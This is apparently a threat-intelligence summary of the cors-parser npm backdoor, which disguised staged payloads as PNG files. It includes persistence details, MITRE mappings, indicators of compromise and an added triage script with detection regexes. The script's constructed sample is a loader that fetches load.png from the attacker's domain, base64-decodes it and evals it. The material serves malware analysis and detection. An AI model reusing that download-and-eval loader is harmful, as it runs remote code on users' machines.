cors-parser is an npm package that masks a cross-platform backdoor inside seemingly ordinary PNG files. Researchers show how the first-stage code downloads initial.png, decodes further payloads, and installs platform-specific backdoors that auto-start on reboot or at specific events.
#cors-parser #SilverSparrow
Keypoints
- The cors-parser package versions 1.0.0 to 3.0.1 contain a minimal index.js that downloads an external PNG-like file (initial.png) from api.jz-aws.info.
- initial.png is not a real image: it lacks a PNG header and consists of a large base64-encoded string that decodes to further Node.js code, which pulls a stage-2 payload from the same domain.
- Stage-2 payloads are platform-specific: Windows downloads DLLs via load.png and wait.png, while Unix-like systems fetch binaries such as manner.png or middle.png based on architecture.
- Downloaded binaries are configured to run as background processes and persist via startup mechanisms (Windows Run registry keys; Unix cronjobs or scheduled tasks).
- The operation relies on a primitive form of file-type masquerading (described as crude steganography): code is renamed to a .png extension so that it passes casual inspection and extension-based tooling, even though the files carry no image data and fail a magic-byte check.
- The npm package has been taken down, the related domain (jz-aws.info) is blocked, and antivirus tooling labels the Windows/macOS payloads as a backdoor trojan (“Silver”).
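The keypoints above describe a chain that is easy to triage statically: a file that claims to be a PNG but has no PNG signature, whose body is one large base64 blob, and whose decoded form downloads and eval()s the next stage. The following is an added triage example written for this page; it is not code from cors-parser or from the Sonatype write-up. The IoC domain and filename lists are the ones reported above, the regexes are heuristics chosen here, and the sample files (SAMPLE_STAGE2, SAMPLE_FAKE_PNG, SAMPLE_REAL_PNG) are constructed, not the real payloads.

```javascript
// Added triage example (not cors-parser's code, not the write-up's code).
// Flags files named *.png that lack the PNG signature, carry a large base64
// blob, and decode to stage-loader JavaScript. Sample inputs are constructed.

const PNG_MAGIC = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
// Indicators reported in the write-up.
const IOC_DOMAINS = ['api.jz-aws.info', 'jz-aws.info'];
const IOC_FILES = ['initial.png', 'load.png', 'wait.png', 'manner.png', 'middle.png', 'list.png'];

// A genuine PNG starts with the 8-byte signature; the disguised files do not.
function isRealPng(buf) {
  return buf.length >= PNG_MAGIC.length && buf.subarray(0, 8).equals(PNG_MAGIC);
}

// Longest run of base64 alphabet of at least minLen characters, or null.
function largestBase64Run(text, minLen = 64) {
  const re = /[A-Za-z0-9+/]{64,}={0,2}/g;
  let best = null;
  for (const m of text.matchAll(re)) {
    if (m[0].length >= minLen && (best === null || m[0].length > best.length)) best = m[0];
  }
  return best;
}

// Static indicators of a stage loader in JavaScript source text (heuristics).
function dropperIndicators(js) {
  const hits = new Set();
  if (/\beval\s*\(/.test(js)) hits.add('eval');
  if (/\b(?:https?\.get|fetch|request)\s*\(/.test(js)) hits.add('download');
  if (/Buffer\.from\([^)]*['"]base64['"]\s*\)/.test(js)) hits.add('base64-decode');
  for (const d of IOC_DOMAINS) if (js.includes(d)) hits.add('ioc-domain:' + d);
  for (const f of IOC_FILES) if (js.includes(f)) hits.add('ioc-file:' + f);
  return [...hits];
}

// Triage a file that claims to be a PNG: { name, realPng, indicators }.
function triagePng(name, buf) {
  const result = { name, realPng: isRealPng(buf), indicators: [] };
  if (result.realPng) return result; // signature present: treat as an image
  const text = buf.toString('utf8');
  const hits = new Set(dropperIndicators(text)); // indicators in the file as-is
  const blob = largestBase64Run(text);
  if (blob !== null) {
    hits.add('base64-blob');
    // Decode the blob and look for the same indicators in the decoded stage.
    const decoded = Buffer.from(blob, 'base64').toString('utf8');
    for (const h of dropperIndicators(decoded)) hits.add(h);
  }
  result.indicators = [...hits];
  return result;
}

// --- constructed samples (not the real payloads) ---
// A stage-2-style loader: fetch the next ".png", base64-decode it, eval it.
const SAMPLE_STAGE2 = [
  "const https = require('https');",
  "https.get('https://api.jz-aws.info/load.png', (r) => {",
  "  let d = ''; r.on('data', (c) => { d += c; });",
  "  r.on('end', () => eval(Buffer.from(d, 'base64').toString('utf8')));",
  '});',
].join('\n');
// What a disguised initial.png looks like: only the base64 of the stage above.
const SAMPLE_FAKE_PNG = Buffer.from(
  Buffer.from(SAMPLE_STAGE2, 'utf8').toString('base64') + '\n', 'utf8');
// A minimal genuine PNG header (signature plus the start of an IHDR chunk).
const SAMPLE_REAL_PNG = Buffer.concat([PNG_MAGIC, Buffer.from([0, 0, 0, 13]), Buffer.from('IHDR')]);

// Run both samples through triage; the first is flagged, the second is clean.
function demo() {
  return [triagePng('initial.png', SAMPLE_FAKE_PNG), triagePng('logo.png', SAMPLE_REAL_PNG)];
}

console.log(JSON.stringify(demo(), null, 2));
```

The signature check alone is enough to expose the masquerade; the base64 and regex checks are there so that the same script can be pointed at a package's index.js to surface the download-decode-eval pattern before anything is executed.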
MITRE Techniques
- [T1105] Ingress Tool Transfer – The code downloads an ‘initial.png’ file from an external server. “The code downloads, what appears to be a simple PNG (image) from an external server.”
- [T1027] Obfuscated Files and Information – initial.png contains a large base64-encoded string that decodes to the next stage. “a large base64-encoded string — just more NodeJS instructions that download stage 2 payload from ‘api.jz-aws.info’.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – index.js is the JavaScript entry point; it decodes the downloaded payload and executes it via eval. “eval(plain)”
- [T1036] Masquerading – File extensions are changed to “.png” so that text files containing code pass as images. “the threat actor’s act of changing file extensions to “.png” (when these are really text files containing code).”
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – On Windows the dropped payloads are configured to launch at startup through Run registry keys. “register autorun” and related commands show the persistence mechanism.
- [T1053] Scheduled Task/Job – On Unix-like systems the downloaded binaries are added as a cronjob (sub-technique T1053.003, Cron) or scheduled task so that they launch at boot or on specific events. “downloaded binaries were added as a ‘cronjob’ or scheduled task to the operating system…”
Indicators of Compromise
- [Domain] api.jz-aws.info – used to host initial.png and stage-2 payloads; example: initial.png fetched from this domain.
- [Domain] jz-aws.info – parent domain of the hosting server, reported as blocked at the time of writing; the stage-2 download calls reference this domain and its subdomains.
- [File] initial.png – first-stage payload carrier downloaded from the remote server.
- [File] load.png – Windows stage-2 payload (DLL) disguised as a PNG.
- [File] wait.png – Windows stage-2 payload (DLL) disguised as a PNG.
- [File] manner.png / middle.png / list.png – Unix/macOS/architecture-specific payloads disguised as PNGs.
Read more: https://www.sonatype.com/blog/cors-parser-npm-package-hides-cross-platform-backdoor-in-png-files